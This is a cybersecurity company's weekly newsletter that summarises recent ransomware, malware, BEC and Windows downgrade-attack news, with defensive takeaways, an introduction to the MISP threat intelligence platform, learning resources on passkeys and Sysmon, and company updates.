Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Home Users Increasingly Targeted by Ransomware
A significant increase in Magniber ransomware attacks is targeting home users worldwide, encrypting their devices and demanding ransoms.
Top 4 takeaways:
🪲 The ransomware is spread through Windows zero-days, fake updates, and trojanized software cracks and key generators.
🧑💻 Victims receive a ransom note demanding $1,000, which increases to $5,000 if not paid within three days.
🩹 Currently, there is no free way to decrypt files encrypted by Magniber after the group patched a flaw that allowed free file decryption via a decryptor released by AhnLab in 2018.
🛡️ Users are advised to avoid software cracks and key generators as it’s not only illegal but also a common method used to distribute malware and ransomware.
Hacked Digital Classroom Software Hacked Used to Wipe Student Devices
Mobile Guardian, a digital classroom management platform, was hacked, leading to the remote wiping of data from at least 13,000 student devices.
Top 4 takeaways:
🌍 The breach affected instances in North America, Europe, and Singapore, with a significant impact reported in Singapore.
🙅♂️ Mobile Guardian stated there’s no evidence of data access or exfiltration by the hacker.
🛡️ The Ministry of Education (MOE) expressed strong concerns and is working to restore affected devices and will remove the Mobile Guardian Device Management Application from all iPads and Chromebooks.
🧑💻 MOE is deploying additional IT teams and providing extra learning resources to support affected students.
Ministry of Education Singapore
INTERPOL Recovers $40 Million Lost in Business Email Compromise Attack
INTERPOL recovered over $40 million stolen in a Business Email Compromise (BEC) attack on a Singaporean company.
Top 3 takeaways:
😈 The company was tricked into sending $42.3 million to an attacker-controlled account through a fraudulent email.
👮 INTERPOL’s I-GRIP mechanism and cooperation with Timor Leste authorities led to the recovery and arrest of suspects.
🌍 This was one of the outcomes of a global police operation in June, which arrested 3,950 people involved in various cyber scams, recovered millions of dollars, and highlighted the importance of swift, international cooperation in combating financial crimes.
IT Staff targeted my new SharpRino Malware to Spread Ransomware
The ransomware group Hunters International is using a new C# remote access trojan (RAT) called SharpRhino to breach corporate networks.
Top 4 takeaways:
🪲 The malware is spread through a typosquatting site impersonating the Angry IP Scanner website.
⚡ SharpRhino establishes persistence, provides remote access, and uses fileless malware techniques to evade detection.
😈 This group has become the 10th most active ransomware group in 2024, with 134 attacks in the first seven months, and is suspected to have ties to the defunct Hive ransomware group.
🛡️ Users should avoid sponsored search results, use ad blockers, bookmark official sites, establish backup plans, perform network segmentation, and keep software updated.
Windows Downdate Attack Downgrades Windows Updates to Roll Back Patches
Two zero days (CVE-2024-38202 and CVE-2024-21302) can be exploited to downgrade Windows systems and reintroduce old vulnerabilities.
Top 5 takeaways:
🪲 Attackers can force systems to roll back to older software versions, making them susceptible to past vulnerabilities.
⚡ The attack is invisible to endpoint detection and response (EDR) solutions, and Windows Update falsely reports the system as fully updated.
🧑💻 Researchers have released a tool to demonstrate this capability. It can take over the Windows Update process and allow undetectable, invisible, persistent, and irreversible downgrades of critical OS components.
🧪 The findings emphasize the need for increased awareness and research into OS-based downgrade attacks, as well as the importance of reviewing design features within an OS as potential attack surfaces.
🛡️ Microsoft is working on a fix and has issued advisories with mitigation advice until the update is released.
Top Tips of the Week
Threat Intelligence
- Regularly communicate CTI insights to stakeholders. Keep decision-makers informed to guide strategic security decisions.
- Use CTI to enhance threat intelligence platforms (TIPs). Leverage insights for continuous improvement and optimization of TIP capabilities.
Threat Hunting
- Understand the value of threat intelligence in penetration testing. Use insights to enhance real-world attack simulations.
Custom Tooling
- Implement continuous monitoring for custom tools. Proactively identify issues, assess performance, and ensure ongoing reliability.
- Consider the accessibility of custom tools. Design interfaces and functionalities that cater to users with diverse needs and requirements.
- Regularly review custom tool access controls. Ensure that permissions align with organizational roles and responsibilities.
- Understand your specific needs before creating custom tools. Tailor solutions to your unique challenges for optimal effectiveness.
Feature Article
MISP (Malware Information Sharing Platform and Threat Sharing) is an open-source threat intelligence platform that allows you to share, collate, analyze, and distribute threat intelligence.
Today, you will learn how to start using MISP. You will learn about MISP events, how to create them, and how to add context to them using MISP’s galaxies and taxonomies. This will teach you the fundamentals of using MISP to fulfill your threat intelligence needs!
Learning Resources
Discover How to Use Passkeys in Microsoft 365
If you are a Microsoft user, you should be using passkeys. They enhance Microsoft 365 security, eliminate the need for complex passwords, and can even be used for biometric authentication.
This comprehensive guide will teach you how to set them up and enforce their use through conditional access policies.
Unlock the Power of Sysmon
Sysmon is a Windows device driver and service that can log a whole bunch of useful stuff on Windows machines. It is often used by incident responders and threat hunters to understand how a cyber attack went down.
It is also highly customizable and can fit your specific needs to reduce alert fatigue, provide granular visibility, and complement existing security tools.
This great presentation on Sysmon for Industrial Control System (ICS) environments explains the capabilities of Sysmon, deployment considerations, and practical tips for setting it up.
Learn How to Build Your Dream Cyber Security Home Lab
Home labs are perhaps the single greatest tool you can use to learn practical cyber security skills. This comprehensive guide walks you through how to set one up, the hardware and software considerations, networking components, storage options, and more.
A must watch for anyone interested in gaining hands-on cyber experience!
Quickly Find IOCs Using PowerSIEM (Sysmon + PowerShell)
PowerSIEM is a PowerShell script that can analyze Sysmon events dynamically to aid in malware analysis, threat hunting, and detection engineering. The script provides real-time information and removes the dependency on tools like Elastic or Splunk.
In this video, it’s creator (the legendary IppSec), demonstrates how you can use it to analyze common attack techniques, customize it to suit your needs, and more.
Personal Notes
🤔 This week at Kraven, we have focused on improving our email marketing and sales process. We have focused on building an email sales funnel that provides a ton of free value to our potential clients through templates, learning resources, and advice while also highlighting how our Coaching & Mentorship program can take their skills to the next level.
I feel we have neglected to tell customers about our unique service offering in the past or failed to answer concerns or questions holding them back. The new email sequence we are working on aims to tackle those roadblocks head-on and provide more free value to those who are not quite ready to make the jump. After all, our mission is to help everyone learn CTI, and that is the reason we produce high-quality, free learning resources.
Aside from sales, we have also been focused on delivering actionable resources like templates and kickstart guides. We currently have three templates in the works: one for Intelligence Requirements, one for a Collection Management Framework, and another for a CTI report. These templates are designed to save you time implementing common CTI processes at your organization, and we hope you find them valuable
